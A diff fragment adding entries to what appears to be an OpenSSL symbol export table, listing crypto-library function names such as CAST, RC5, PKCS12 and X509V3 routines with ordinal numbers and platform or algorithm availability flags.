+BN_BLINDING_invert                      974	EXIST::FUNCTION:
+BN_BLINDING_update                      975	EXIST::FUNCTION:
+RSA_blinding_on                         977	EXIST::FUNCTION:RSA
+RSA_blinding_off                        978	EXIST::FUNCTION:RSA
+i2t_ASN1_OBJECT                         979	EXIST::FUNCTION:
+BN_BLINDING_new                         980	EXIST::FUNCTION:
+BN_BLINDING_free                        981	EXIST::FUNCTION:
+EVP_cast5_cbc                           983	EXIST::FUNCTION:CAST
+EVP_cast5_cfb64                         984	EXIST::FUNCTION:CAST
+EVP_cast5_ecb                           985	EXIST::FUNCTION:CAST
+EVP_cast5_ofb                           986	EXIST::FUNCTION:CAST
+BF_decrypt                              987	EXIST::FUNCTION:BF
+CAST_set_key                            988	EXIST::FUNCTION:CAST
+CAST_encrypt                            989	EXIST::FUNCTION:CAST
+CAST_decrypt                            990	EXIST::FUNCTION:CAST
+CAST_ecb_encrypt                        991	EXIST::FUNCTION:CAST
+CAST_cbc_encrypt                        992	EXIST::FUNCTION:CAST
+CAST_cfb64_encrypt                      993	EXIST::FUNCTION:CAST
+CAST_ofb64_encrypt                      994	EXIST::FUNCTION:CAST
+RC2_decrypt                             995	EXIST::FUNCTION:RC2
+OBJ_create_objects                      997	EXIST::FUNCTION:
+BN_exp                                  998	EXIST::FUNCTION:
+BN_mul_word                             999	EXIST::FUNCTION:
+BN_sub_word                             1000	EXIST::FUNCTION:
+BN_dec2bn                               1001	EXIST::FUNCTION:
+BN_bn2dec                               1002	EXIST::FUNCTION:
+BIO_ghbn_ctrl                           1003	NOEXIST::FUNCTION:
+CRYPTO_free_ex_data                     1004	EXIST::FUNCTION:
+CRYPTO_get_ex_data                      1005	EXIST::FUNCTION:
+CRYPTO_set_ex_data                      1007	EXIST::FUNCTION:
+ERR_load_CRYPTO_strings                 1009	EXIST:!OS2,!VMS:FUNCTION:
+ERR_load_CRYPTOlib_strings              1009	EXIST:OS2,VMS:FUNCTION:
+EVP_PKEY_bits                           1010	EXIST::FUNCTION:
+MD5_Transform                           1011	EXIST::FUNCTION:MD5
+SHA1_Transform                          1012	EXIST::FUNCTION:SHA,SHA1
+SHA_Transform                           1013	EXIST::FUNCTION:SHA,SHA0
+X509_STORE_CTX_get_chain                1014	EXIST::FUNCTION:
+X509_STORE_CTX_get_current_cert         1015	EXIST::FUNCTION:
+X509_STORE_CTX_get_error                1016	EXIST::FUNCTION:
+X509_STORE_CTX_get_error_depth          1017	EXIST::FUNCTION:
+X509_STORE_CTX_get_ex_data              1018	EXIST::FUNCTION:
+X509_STORE_CTX_set_cert                 1020	EXIST::FUNCTION:
+X509_STORE_CTX_set_chain                1021	EXIST::FUNCTION:
+X509_STORE_CTX_set_error                1022	EXIST::FUNCTION:
+X509_STORE_CTX_set_ex_data              1023	EXIST::FUNCTION:
+CRYPTO_dup_ex_data                      1025	EXIST::FUNCTION:
+CRYPTO_get_new_lockid                   1026	EXIST::FUNCTION:
+CRYPTO_new_ex_data                      1027	EXIST::FUNCTION:
+RSA_set_ex_data                         1028	EXIST::FUNCTION:RSA
+RSA_get_ex_data                         1029	EXIST::FUNCTION:RSA
+RSA_get_ex_new_index                    1030	EXIST::FUNCTION:RSA
+RSA_padding_add_PKCS1_type_1            1031	EXIST::FUNCTION:RSA
+RSA_padding_add_PKCS1_type_2            1032	EXIST::FUNCTION:RSA
+RSA_padding_add_SSLv23                  1033	EXIST::FUNCTION:RSA
+RSA_padding_add_none                    1034	EXIST::FUNCTION:RSA
+RSA_padding_check_PKCS1_type_1          1035	EXIST::FUNCTION:RSA
+RSA_padding_check_PKCS1_type_2          1036	EXIST::FUNCTION:RSA
+RSA_padding_check_SSLv23                1037	EXIST::FUNCTION:RSA
+RSA_padding_check_none                  1038	EXIST::FUNCTION:RSA
+bn_add_words                            1039	EXIST::FUNCTION:
+d2i_Netscape_RSA_2                      1040	NOEXIST::FUNCTION:
+CRYPTO_get_ex_new_index                 1041	EXIST::FUNCTION:
+RIPEMD160_Init                          1042	EXIST::FUNCTION:RIPEMD
+RIPEMD160_Update                        1043	EXIST::FUNCTION:RIPEMD
+RIPEMD160_Final                         1044	EXIST::FUNCTION:RIPEMD
+RIPEMD160                               1045	EXIST::FUNCTION:RIPEMD
+RIPEMD160_Transform                     1046	EXIST::FUNCTION:RIPEMD
+RC5_32_set_key                          1047	EXIST::FUNCTION:RC5
+RC5_32_ecb_encrypt                      1048	EXIST::FUNCTION:RC5
+RC5_32_encrypt                          1049	EXIST::FUNCTION:RC5
+RC5_32_decrypt                          1050	EXIST::FUNCTION:RC5
+RC5_32_cbc_encrypt                      1051	EXIST::FUNCTION:RC5
+RC5_32_cfb64_encrypt                    1052	EXIST::FUNCTION:RC5
+RC5_32_ofb64_encrypt                    1053	EXIST::FUNCTION:RC5
+BN_bn2mpi                               1058	EXIST::FUNCTION:
+BN_mpi2bn                               1059	EXIST::FUNCTION:
+ASN1_BIT_STRING_get_bit                 1060	EXIST::FUNCTION:
+ASN1_BIT_STRING_set_bit                 1061	EXIST::FUNCTION:
+BIO_get_ex_data                         1062	EXIST::FUNCTION:
+BIO_get_ex_new_index                    1063	EXIST::FUNCTION:
+BIO_set_ex_data                         1064	EXIST::FUNCTION:
+X509v3_get_key_usage                    1066	NOEXIST::FUNCTION:
+X509v3_set_key_usage                    1067	NOEXIST::FUNCTION:
+a2i_X509v3_key_usage                    1068	NOEXIST::FUNCTION:
+i2a_X509v3_key_usage                    1069	NOEXIST::FUNCTION:
+EVP_PKEY_decrypt                        1070	EXIST::FUNCTION:
+EVP_PKEY_encrypt                        1071	EXIST::FUNCTION:
+PKCS7_RECIP_INFO_set                    1072	EXIST::FUNCTION:
+PKCS7_add_recipient                     1073	EXIST::FUNCTION:
+PKCS7_add_recipient_info                1074	EXIST::FUNCTION:
+PKCS7_set_cipher                        1075	EXIST::FUNCTION:
+ASN1_TYPE_get_int_octetstring           1076	EXIST::FUNCTION:
+ASN1_TYPE_get_octetstring               1077	EXIST::FUNCTION:
+ASN1_TYPE_set_int_octetstring           1078	EXIST::FUNCTION:
+ASN1_TYPE_set_octetstring               1079	EXIST::FUNCTION:
+ASN1_UTCTIME_set_string                 1080	EXIST::FUNCTION:
+ERR_add_error_data                      1081	EXIST::FUNCTION:
+ERR_set_error_data                      1082	EXIST::FUNCTION:
+EVP_CIPHER_asn1_to_param                1083	EXIST::FUNCTION:
+EVP_CIPHER_param_to_asn1                1084	EXIST::FUNCTION:
+EVP_CIPHER_get_asn1_iv                  1085	EXIST::FUNCTION:
+EVP_CIPHER_set_asn1_iv                  1086	EXIST::FUNCTION:
+EVP_rc5_32_12_16_cbc                    1087	EXIST::FUNCTION:RC5
+EVP_rc5_32_12_16_cfb64                  1088	EXIST::FUNCTION:RC5
+EVP_rc5_32_12_16_ecb                    1089	EXIST::FUNCTION:RC5
+EVP_rc5_32_12_16_ofb                    1090	EXIST::FUNCTION:RC5
+asn1_add_error                          1091	EXIST::FUNCTION:
+d2i_ASN1_BMPSTRING                      1092	EXIST::FUNCTION:
+i2d_ASN1_BMPSTRING                      1093	EXIST::FUNCTION:
+BIO_f_ber                               1094	NOEXIST::FUNCTION:
+BN_init                                 1095	EXIST::FUNCTION:
+COMP_CTX_new                            1096	EXIST::FUNCTION:
+COMP_CTX_free                           1097	EXIST::FUNCTION:
+COMP_CTX_compress_block                 1098	NOEXIST::FUNCTION:
+COMP_CTX_expand_block                   1099	NOEXIST::FUNCTION:
+X509_STORE_CTX_get_ex_new_index         1100	EXIST::FUNCTION:
+OBJ_NAME_add                            1101	EXIST::FUNCTION:
+BIO_socket_nbio                         1102	EXIST::FUNCTION:
+EVP_rc2_64_cbc                          1103	EXIST::FUNCTION:RC2
+OBJ_NAME_cleanup                        1104	EXIST::FUNCTION:
+OBJ_NAME_get                            1105	EXIST::FUNCTION:
+OBJ_NAME_init                           1106	EXIST::FUNCTION:
+OBJ_NAME_new_index                      1107	EXIST::FUNCTION:
+OBJ_NAME_remove                         1108	EXIST::FUNCTION:
+BN_MONT_CTX_copy                        1109	EXIST::FUNCTION:
+BIO_new_socks4a_connect                 1110	NOEXIST::FUNCTION:
+BIO_s_socks4a_connect                   1111	NOEXIST::FUNCTION:
+PROXY_set_connect_mode                  1112	NOEXIST::FUNCTION:
+RAND_SSLeay                             1113	EXIST::FUNCTION:
+RAND_set_rand_method                    1114	EXIST::FUNCTION:
+RSA_memory_lock                         1115	EXIST::FUNCTION:RSA
+bn_sub_words                            1116	EXIST::FUNCTION:
+bn_mul_normal                           1117	NOEXIST::FUNCTION:
+bn_mul_comba8                           1118	NOEXIST::FUNCTION:
+bn_mul_comba4                           1119	NOEXIST::FUNCTION:
+bn_sqr_normal                           1120	NOEXIST::FUNCTION:
+bn_sqr_comba8                           1121	NOEXIST::FUNCTION:
+bn_sqr_comba4                           1122	NOEXIST::FUNCTION:
+bn_cmp_words                            1123	NOEXIST::FUNCTION:
+bn_mul_recursive                        1124	NOEXIST::FUNCTION:
+bn_mul_part_recursive                   1125	NOEXIST::FUNCTION:
+bn_sqr_recursive                        1126	NOEXIST::FUNCTION:
+bn_mul_low_normal                       1127	NOEXIST::FUNCTION:
+BN_RECP_CTX_init                        1128	EXIST::FUNCTION:
+BN_RECP_CTX_new                         1129	EXIST::FUNCTION:
+BN_RECP_CTX_free                        1130	EXIST::FUNCTION:
+BN_RECP_CTX_set                         1131	EXIST::FUNCTION:
+BN_mod_mul_reciprocal                   1132	EXIST::FUNCTION:
+BN_mod_exp_recp                         1133	EXIST::FUNCTION:
+BN_div_recp                             1134	EXIST::FUNCTION:
+BN_CTX_init                             1135	EXIST::FUNCTION:DEPRECATED
+BN_MONT_CTX_init                        1136	EXIST::FUNCTION:
+RAND_get_rand_method                    1137	EXIST::FUNCTION:
+PKCS7_add_attribute                     1138	EXIST::FUNCTION:
+PKCS7_add_signed_attribute              1139	EXIST::FUNCTION:
+PKCS7_digest_from_attributes            1140	EXIST::FUNCTION:
+PKCS7_get_attribute                     1141	EXIST::FUNCTION:
+PKCS7_get_issuer_and_serial             1142	EXIST::FUNCTION:
+PKCS7_get_signed_attribute              1143	EXIST::FUNCTION:
+COMP_compress_block                     1144	EXIST::FUNCTION:
+COMP_expand_block                       1145	EXIST::FUNCTION:
+COMP_rle                                1146	EXIST::FUNCTION:
+COMP_zlib                               1147	EXIST::FUNCTION:
+ms_time_diff                            1148	NOEXIST::FUNCTION:
+ms_time_new                             1149	NOEXIST::FUNCTION:
+ms_time_free                            1150	NOEXIST::FUNCTION:
+ms_time_cmp                             1151	NOEXIST::FUNCTION:
+ms_time_get                             1152	NOEXIST::FUNCTION:
+PKCS7_set_attributes                    1153	EXIST::FUNCTION:
+PKCS7_set_signed_attributes             1154	EXIST::FUNCTION:
+X509_ATTRIBUTE_create                   1155	EXIST::FUNCTION:
+X509_ATTRIBUTE_dup                      1156	EXIST::FUNCTION:
+ASN1_GENERALIZEDTIME_check              1157	EXIST::FUNCTION:
+ASN1_GENERALIZEDTIME_print              1158	EXIST::FUNCTION:BIO
+ASN1_GENERALIZEDTIME_set                1159	EXIST::FUNCTION:
+ASN1_GENERALIZEDTIME_set_string         1160	EXIST::FUNCTION:
+ASN1_TIME_print                         1161	EXIST::FUNCTION:BIO
+BASIC_CONSTRAINTS_free                  1162	EXIST::FUNCTION:
+BASIC_CONSTRAINTS_new                   1163	EXIST::FUNCTION:
+ERR_load_X509V3_strings                 1164	EXIST::FUNCTION:
+NETSCAPE_CERT_SEQUENCE_free             1165	EXIST::FUNCTION:
+NETSCAPE_CERT_SEQUENCE_new              1166	EXIST::FUNCTION:
+OBJ_txt2obj                             1167	EXIST::FUNCTION:
+PEM_read_NETSCAPE_CERT_SEQUENCE         1168	EXIST:!VMS,!WIN16:FUNCTION:
+PEM_read_NS_CERT_SEQ                    1168	EXIST:VMS:FUNCTION:
+PEM_read_bio_NETSCAPE_CERT_SEQUENCE     1169	EXIST:!VMS:FUNCTION:
+PEM_read_bio_NS_CERT_SEQ                1169	EXIST:VMS:FUNCTION:
+PEM_write_NETSCAPE_CERT_SEQUENCE        1170	EXIST:!VMS,!WIN16:FUNCTION:
+PEM_write_NS_CERT_SEQ                   1170	EXIST:VMS:FUNCTION:
+PEM_write_bio_NETSCAPE_CERT_SEQUENCE    1171	EXIST:!VMS:FUNCTION:
+PEM_write_bio_NS_CERT_SEQ               1171	EXIST:VMS:FUNCTION:
+X509V3_EXT_add                          1172	EXIST::FUNCTION:
+X509V3_EXT_add_alias                    1173	EXIST::FUNCTION:
+X509V3_EXT_add_conf                     1174	EXIST::FUNCTION:
+X509V3_EXT_cleanup                      1175	EXIST::FUNCTION:
+X509V3_EXT_conf                         1176	EXIST::FUNCTION:
+X509V3_EXT_conf_nid                     1177	EXIST::FUNCTION:
+X509V3_EXT_get                          1178	EXIST::FUNCTION:
+X509V3_EXT_get_nid                      1179	EXIST::FUNCTION:
+X509V3_EXT_print                        1180	EXIST::FUNCTION:
+X509V3_EXT_print_fp                     1181	EXIST::FUNCTION:
+X509V3_add_standard_extensions          1182	EXIST::FUNCTION:
+X509V3_add_value                        1183	EXIST::FUNCTION:
+X509V3_add_value_bool                   1184	EXIST::FUNCTION:
+X509V3_add_value_int                    1185	EXIST::FUNCTION:
+X509V3_conf_free                        1186	EXIST::FUNCTION:
+X509V3_get_value_bool                   1187	EXIST::FUNCTION:
+X509V3_get_value_int                    1188	EXIST::FUNCTION:
+X509V3_parse_list                       1189	EXIST::FUNCTION:
+d2i_ASN1_GENERALIZEDTIME                1190	EXIST::FUNCTION:
+d2i_ASN1_TIME                           1191	EXIST::FUNCTION:
+d2i_BASIC_CONSTRAINTS                   1192	EXIST::FUNCTION:
+d2i_NETSCAPE_CERT_SEQUENCE              1193	EXIST::FUNCTION:
+d2i_ext_ku                              1194	NOEXIST::FUNCTION:
+ext_ku_free                             1195	NOEXIST::FUNCTION:
+ext_ku_new                              1196	NOEXIST::FUNCTION:
+i2d_ASN1_GENERALIZEDTIME                1197	EXIST::FUNCTION:
+i2d_ASN1_TIME                           1198	EXIST::FUNCTION:
+i2d_BASIC_CONSTRAINTS                   1199	EXIST::FUNCTION:
+i2d_NETSCAPE_CERT_SEQUENCE              1200	EXIST::FUNCTION:
+i2d_ext_ku                              1201	NOEXIST::FUNCTION:
+EVP_MD_CTX_copy                         1202	EXIST::FUNCTION:
+i2d_ASN1_ENUMERATED                     1203	EXIST::FUNCTION:
+d2i_ASN1_ENUMERATED                     1204	EXIST::FUNCTION:
+ASN1_ENUMERATED_set                     1205	EXIST::FUNCTION:
+ASN1_ENUMERATED_get                     1206	EXIST::FUNCTION:
+BN_to_ASN1_ENUMERATED                   1207	EXIST::FUNCTION:
+ASN1_ENUMERATED_to_BN                   1208	EXIST::FUNCTION:
+i2a_ASN1_ENUMERATED                     1209	EXIST::FUNCTION:BIO
+a2i_ASN1_ENUMERATED                     1210	EXIST::FUNCTION:BIO
+i2d_GENERAL_NAME                        1211	EXIST::FUNCTION:
+d2i_GENERAL_NAME                        1212	EXIST::FUNCTION:
+GENERAL_NAME_new                        1213	EXIST::FUNCTION:
+GENERAL_NAME_free                       1214	EXIST::FUNCTION:
+GENERAL_NAMES_new                       1215	EXIST::FUNCTION:
+GENERAL_NAMES_free                      1216	EXIST::FUNCTION:
+d2i_GENERAL_NAMES                       1217	EXIST::FUNCTION:
+i2d_GENERAL_NAMES                       1218	EXIST::FUNCTION:
+i2v_GENERAL_NAMES                       1219	EXIST::FUNCTION:
+i2s_ASN1_OCTET_STRING                   1220	EXIST::FUNCTION:
+s2i_ASN1_OCTET_STRING                   1221	EXIST::FUNCTION:
+X509V3_EXT_check_conf                   1222	NOEXIST::FUNCTION:
+hex_to_string                           1223	EXIST::FUNCTION:
+string_to_hex                           1224	EXIST::FUNCTION:
+DES_ede3_cbcm_encrypt                   1225	EXIST::FUNCTION:DES
+RSA_padding_add_PKCS1_OAEP              1226	EXIST::FUNCTION:RSA
+RSA_padding_check_PKCS1_OAEP            1227	EXIST::FUNCTION:RSA
+X509_CRL_print_fp                       1228	EXIST::FUNCTION:FP_API
+X509_CRL_print                          1229	EXIST::FUNCTION:BIO
+i2v_GENERAL_NAME                        1230	EXIST::FUNCTION:
+v2i_GENERAL_NAME                        1231	EXIST::FUNCTION:
+i2d_PKEY_USAGE_PERIOD                   1232	EXIST::FUNCTION:
+d2i_PKEY_USAGE_PERIOD                   1233	EXIST::FUNCTION:
+PKEY_USAGE_PERIOD_new                   1234	EXIST::FUNCTION:
+PKEY_USAGE_PERIOD_free                  1235	EXIST::FUNCTION:
+v2i_GENERAL_NAMES                       1236	EXIST::FUNCTION:
+i2s_ASN1_INTEGER                        1237	EXIST::FUNCTION:
+X509V3_EXT_d2i                          1238	EXIST::FUNCTION:
+name_cmp                                1239	EXIST::FUNCTION:
+str_dup                                 1240	NOEXIST::FUNCTION:
+i2s_ASN1_ENUMERATED                     1241	EXIST::FUNCTION:
+i2s_ASN1_ENUMERATED_TABLE               1242	EXIST::FUNCTION:
+BIO_s_log                               1243	EXIST:!OS2,!WIN16,!WIN32,!macintosh:FUNCTION:
+BIO_f_reliable                          1244	EXIST::FUNCTION:BIO
+PKCS7_dataFinal                         1245	EXIST::FUNCTION:
+PKCS7_dataDecode                        1246	EXIST::FUNCTION:
+X509V3_EXT_CRL_add_conf                 1247	EXIST::FUNCTION:
+BN_set_params                           1248	EXIST::FUNCTION:DEPRECATED
+BN_get_params                           1249	EXIST::FUNCTION:DEPRECATED
+BIO_get_ex_num                          1250	NOEXIST::FUNCTION:
+BIO_set_ex_free_func                    1251	NOEXIST::FUNCTION:
+EVP_ripemd160                           1252	EXIST::FUNCTION:RIPEMD
+ASN1_TIME_set                           1253	EXIST::FUNCTION:
+i2d_AUTHORITY_KEYID                     1254	EXIST::FUNCTION:
+d2i_AUTHORITY_KEYID                     1255	EXIST::FUNCTION:
+AUTHORITY_KEYID_new                     1256	EXIST::FUNCTION:
+AUTHORITY_KEYID_free                    1257	EXIST::FUNCTION:
+ASN1_seq_unpack                         1258	EXIST::FUNCTION:
+ASN1_seq_pack                           1259	EXIST::FUNCTION:
+ASN1_unpack_string                      1260	EXIST::FUNCTION:
+ASN1_pack_string                        1261	EXIST::FUNCTION:
+PKCS12_pack_safebag                     1262	NOEXIST::FUNCTION:
+PKCS12_MAKE_KEYBAG                      1263	EXIST::FUNCTION:
+PKCS8_encrypt                           1264	EXIST::FUNCTION:
+PKCS12_MAKE_SHKEYBAG                    1265	EXIST::FUNCTION:
+PKCS12_pack_p7data                      1266	EXIST::FUNCTION:
+PKCS12_pack_p7encdata                   1267	EXIST::FUNCTION:
+PKCS12_add_localkeyid                   1268	EXIST::FUNCTION:
+PKCS12_add_friendlyname_asc             1269	EXIST::FUNCTION:
+PKCS12_add_friendlyname_uni             1270	EXIST::FUNCTION:
+PKCS12_get_friendlyname                 1271	EXIST::FUNCTION:
+PKCS12_pbe_crypt                        1272	EXIST::FUNCTION:
+PKCS12_decrypt_d2i                      1273	NOEXIST::FUNCTION:
+PKCS12_i2d_encrypt                      1274	NOEXIST::FUNCTION:
+PKCS12_init                             1275	EXIST::FUNCTION:
+PKCS12_key_gen_asc                      1276	EXIST::FUNCTION:
+PKCS12_key_gen_uni                      1277	EXIST::FUNCTION:
+PKCS12_gen_mac                          1278	EXIST::FUNCTION:
+PKCS12_verify_mac                       1279	EXIST::FUNCTION:
+PKCS12_set_mac                          1280	EXIST::FUNCTION:
+PKCS12_setup_mac                        1281	EXIST::FUNCTION:
+OPENSSL_asc2uni                         1282	EXIST::FUNCTION:
+OPENSSL_uni2asc                         1283	EXIST::FUNCTION:
+i2d_PKCS12_BAGS                         1284	EXIST::FUNCTION:
+PKCS12_BAGS_new                         1285	EXIST::FUNCTION:
+d2i_PKCS12_BAGS                         1286	EXIST::FUNCTION:
+PKCS12_BAGS_free                        1287	EXIST::FUNCTION:
+i2d_PKCS12                              1288	EXIST::FUNCTION:
+d2i_PKCS12                              1289	EXIST::FUNCTION:
+PKCS12_new                              1290	EXIST::FUNCTION:
+PKCS12_free                             1291	EXIST::FUNCTION:
+i2d_PKCS12_MAC_DATA                     1292	EXIST::FUNCTION:
+PKCS12_MAC_DATA_new                     1293	EXIST::FUNCTION:
+d2i_PKCS12_MAC_DATA                     1294	EXIST::FUNCTION:
+PKCS12_MAC_DATA_free                    1295	EXIST::FUNCTION:
+i2d_PKCS12_SAFEBAG                      1296	EXIST::FUNCTION:
+PKCS12_SAFEBAG_new                      1297	EXIST::FUNCTION:
+d2i_PKCS12_SAFEBAG                      1298	EXIST::FUNCTION:
+PKCS12_SAFEBAG_free                     1299	EXIST::FUNCTION:
+ERR_load_PKCS12_strings                 1300	EXIST::FUNCTION:
+PKCS12_PBE_add                          1301	EXIST::FUNCTION:
+PKCS8_add_keyusage                      1302	EXIST::FUNCTION:
+PKCS12_get_attr_gen                     1303	EXIST::FUNCTION:
+PKCS12_parse                            1304	EXIST::FUNCTION:
+PKCS12_create                           1305	EXIST::FUNCTION:
+i2d_PKCS12_bio                          1306	EXIST::FUNCTION:
+i2d_PKCS12_fp                           1307	EXIST::FUNCTION:
+d2i_PKCS12_bio                          1308	EXIST::FUNCTION:
+d2i_PKCS12_fp                           1309	EXIST::FUNCTION:
+i2d_PBEPARAM                            1310	EXIST::FUNCTION:
+PBEPARAM_new                            1311	EXIST::FUNCTION:
+d2i_PBEPARAM                            1312	EXIST::FUNCTION:
+PBEPARAM_free                           1313	EXIST::FUNCTION:
+i2d_PKCS8_PRIV_KEY_INFO                 1314	EXIST::FUNCTION:
+PKCS8_PRIV_KEY_INFO_new                 1315	EXIST::FUNCTION:
+d2i_PKCS8_PRIV_KEY_INFO                 1316	EXIST::FUNCTION:
+PKCS8_PRIV_KEY_INFO_free                1317	EXIST::FUNCTION:
+EVP_PKCS82PKEY                          1318	EXIST::FUNCTION:
+EVP_PKEY2PKCS8                          1319	EXIST::FUNCTION:
+PKCS8_set_broken                        1320	EXIST::FUNCTION:
+EVP_PBE_ALGOR_CipherInit                1321	NOEXIST::FUNCTION:
+EVP_PBE_alg_add                         1322	EXIST::FUNCTION:
+PKCS5_pbe_set                           1323	EXIST::FUNCTION:
+EVP_PBE_cleanup                         1324	EXIST::FUNCTION:
+i2d_SXNET                               1325	EXIST::FUNCTION:
+d2i_SXNET                               1326	EXIST::FUNCTION:
+SXNET_new                               1327	EXIST::FUNCTION:
+SXNET_free                              1328	EXIST::FUNCTION:
+i2d_SXNETID                             1329	EXIST::FUNCTION:
+d2i_SXNETID                             1330	EXIST::FUNCTION:
+SXNETID_new                             1331	EXIST::FUNCTION:
+SXNETID_free                            1332	EXIST::FUNCTION:
+DSA_SIG_new                             1333	EXIST::FUNCTION:DSA
+DSA_SIG_free                            1334	EXIST::FUNCTION:DSA
+DSA_do_sign                             1335	EXIST::FUNCTION:DSA
+DSA_do_verify                           1336	EXIST::FUNCTION:DSA
+d2i_DSA_SIG                             1337	EXIST::FUNCTION:DSA
+i2d_DSA_SIG                             1338	EXIST::FUNCTION:DSA
+i2d_ASN1_VISIBLESTRING                  1339	EXIST::FUNCTION:
+d2i_ASN1_VISIBLESTRING                  1340	EXIST::FUNCTION:
+i2d_ASN1_UTF8STRING                     1341	EXIST::FUNCTION:
+d2i_ASN1_UTF8STRING                     1342	EXIST::FUNCTION:
+i2d_DIRECTORYSTRING                     1343	EXIST::FUNCTION:
+d2i_DIRECTORYSTRING                     1344	EXIST::FUNCTION:
+i2d_DISPLAYTEXT                         1345	EXIST::FUNCTION:
+d2i_DISPLAYTEXT                         1346	EXIST::FUNCTION:
+d2i_ASN1_SET_OF_X509                    1379	NOEXIST::FUNCTION:
+i2d_ASN1_SET_OF_X509                    1380	NOEXIST::FUNCTION:
+i2d_PBKDF2PARAM                         1397	EXIST::FUNCTION:
+PBKDF2PARAM_new                         1398	EXIST::FUNCTION:
+d2i_PBKDF2PARAM                         1399	EXIST::FUNCTION:
+PBKDF2PARAM_free                        1400	EXIST::FUNCTION:
+i2d_PBE2PARAM                           1401	EXIST::FUNCTION:
+PBE2PARAM_new                           1402	EXIST::FUNCTION:
+d2i_PBE2PARAM                           1403	EXIST::FUNCTION:
+PBE2PARAM_free                          1404	EXIST::FUNCTION:
+d2i_ASN1_SET_OF_GENERAL_NAME            1421	NOEXIST::FUNCTION:
+i2d_ASN1_SET_OF_GENERAL_NAME            1422	NOEXIST::FUNCTION:
+d2i_ASN1_SET_OF_SXNETID                 1439	NOEXIST::FUNCTION:
+i2d_ASN1_SET_OF_SXNETID                 1440	NOEXIST::FUNCTION:
+d2i_ASN1_SET_OF_POLICYQUALINFO          1457	NOEXIST::FUNCTION:
+i2d_ASN1_SET_OF_POLICYQUALINFO          1458	NOEXIST::FUNCTION:
+d2i_ASN1_SET_OF_POLICYINFO              1475	NOEXIST::FUNCTION:
+i2d_ASN1_SET_OF_POLICYINFO              1476	NOEXIST::FUNCTION:
+SXNET_add_id_asc                        1477	EXIST::FUNCTION:
+SXNET_add_id_ulong                      1478	EXIST::FUNCTION:
+SXNET_add_id_INTEGER                    1479	EXIST::FUNCTION:
+SXNET_get_id_asc                        1480	EXIST::FUNCTION:
+SXNET_get_id_ulong                      1481	EXIST::FUNCTION:
+SXNET_get_id_INTEGER                    1482	EXIST::FUNCTION:
+X509V3_set_conf_lhash                   1483	EXIST::FUNCTION:
+i2d_CERTIFICATEPOLICIES                 1484	EXIST::FUNCTION:
+CERTIFICATEPOLICIES_new                 1485	EXIST::FUNCTION:
+CERTIFICATEPOLICIES_free                1486	EXIST::FUNCTION:
+d2i_CERTIFICATEPOLICIES                 1487	EXIST::FUNCTION:
+i2d_POLICYINFO                          1488	EXIST::FUNCTION:
+POLICYINFO_new                          1489	EXIST::FUNCTION:
+d2i_POLICYINFO                          1490	EXIST::FUNCTION:
+POLICYINFO_free                         1491	EXIST::FUNCTION:
+i2d_POLICYQUALINFO                      1492	EXIST::FUNCTION:
+POLICYQUALINFO_new                      1493	EXIST::FUNCTION:
+d2i_POLICYQUALINFO                      1494	EXIST::FUNCTION:
+POLICYQUALINFO_free                     1495	EXIST::FUNCTION:
+i2d_USERNOTICE                          1496	EXIST::FUNCTION:
+USERNOTICE_new                          1497	EXIST::FUNCTION:
+d2i_USERNOTICE                          1498	EXIST::FUNCTION:
+USERNOTICE_free                         1499	EXIST::FUNCTION:
+i2d_NOTICEREF                           1500	EXIST::FUNCTION:
+NOTICEREF_new                           1501	EXIST::FUNCTION:
+d2i_NOTICEREF                           1502	EXIST::FUNCTION:
+NOTICEREF_free                          1503	EXIST::FUNCTION:
+X509V3_get_string                       1504	EXIST::FUNCTION:
+X509V3_get_section                      1505	EXIST::FUNCTION:
+X509V3_string_free                      1506	EXIST::FUNCTION:
+X509V3_section_free                     1507	EXIST::FUNCTION:
+X509V3_set_ctx                          1508	EXIST::FUNCTION:
+s2i_ASN1_INTEGER                        1509	EXIST::FUNCTION:
+CRYPTO_set_locked_mem_functions         1510	EXIST::FUNCTION:
+CRYPTO_get_locked_mem_functions         1511	EXIST::FUNCTION:
+CRYPTO_malloc_locked                    1512	EXIST::FUNCTION:
+CRYPTO_free_locked                      1513	EXIST::FUNCTION:
+BN_mod_exp2_mont                        1514	EXIST::FUNCTION:
+ERR_get_error_line_data                 1515	EXIST::FUNCTION:
+ERR_peek_error_line_data                1516	EXIST::FUNCTION:
+PKCS12_PBE_keyivgen                     1517	EXIST::FUNCTION:
+X509_ALGOR_dup                          1518	EXIST::FUNCTION:
+d2i_ASN1_SET_OF_DIST_POINT              1535	NOEXIST::FUNCTION:
+i2d_ASN1_SET_OF_DIST_POINT              1536	NOEXIST::FUNCTION:
+i2d_CRL_DIST_POINTS                     1537	EXIST::FUNCTION:
+CRL_DIST_POINTS_new                     1538	EXIST::FUNCTION:
+CRL_DIST_POINTS_free                    1539	EXIST::FUNCTION:
+d2i_CRL_DIST_POINTS                     1540	EXIST::FUNCTION:
+i2d_DIST_POINT                          1541	EXIST::FUNCTION:
+DIST_POINT_new                          1542	EXIST::FUNCTION:
+d2i_DIST_POINT                          1543	EXIST::FUNCTION:
+DIST_POINT_free                         1544	EXIST::FUNCTION:
+i2d_DIST_POINT_NAME                     1545	EXIST::FUNCTION:
+DIST_POINT_NAME_new                     1546	EXIST::FUNCTION:
+DIST_POINT_NAME_free                    1547	EXIST::FUNCTION:
+d2i_DIST_POINT_NAME                     1548	EXIST::FUNCTION:
+X509V3_add_value_uchar                  1549	EXIST::FUNCTION:
+d2i_ASN1_SET_OF_X509_ATTRIBUTE          1555	NOEXIST::FUNCTION:
+i2d_ASN1_SET_OF_ASN1_TYPE               1560	NOEXIST::FUNCTION:
+d2i_ASN1_SET_OF_X509_EXTENSION          1567	NOEXIST::FUNCTION:
+d2i_ASN1_SET_OF_X509_NAME_ENTRY         1574	NOEXIST::FUNCTION:
+d2i_ASN1_SET_OF_ASN1_TYPE               1589	NOEXIST::FUNCTION:
+i2d_ASN1_SET_OF_X509_ATTRIBUTE          1615	NOEXIST::FUNCTION:
+i2d_ASN1_SET_OF_X509_EXTENSION          1624	NOEXIST::FUNCTION:
+i2d_ASN1_SET_OF_X509_NAME_ENTRY         1633	NOEXIST::FUNCTION:
+X509V3_EXT_i2d                          1646	EXIST::FUNCTION:
+X509V3_EXT_val_prn                      1647	EXIST::FUNCTION:
+X509V3_EXT_add_list                     1648	EXIST::FUNCTION:
+EVP_CIPHER_type                         1649	EXIST::FUNCTION:
+EVP_PBE_CipherInit                      1650	EXIST::FUNCTION:
+X509V3_add_value_bool_nf                1651	EXIST::FUNCTION:
+d2i_ASN1_UINTEGER                       1652	EXIST::FUNCTION:
+sk_value                                1653	EXIST::FUNCTION:
+sk_num                                  1654	EXIST::FUNCTION:
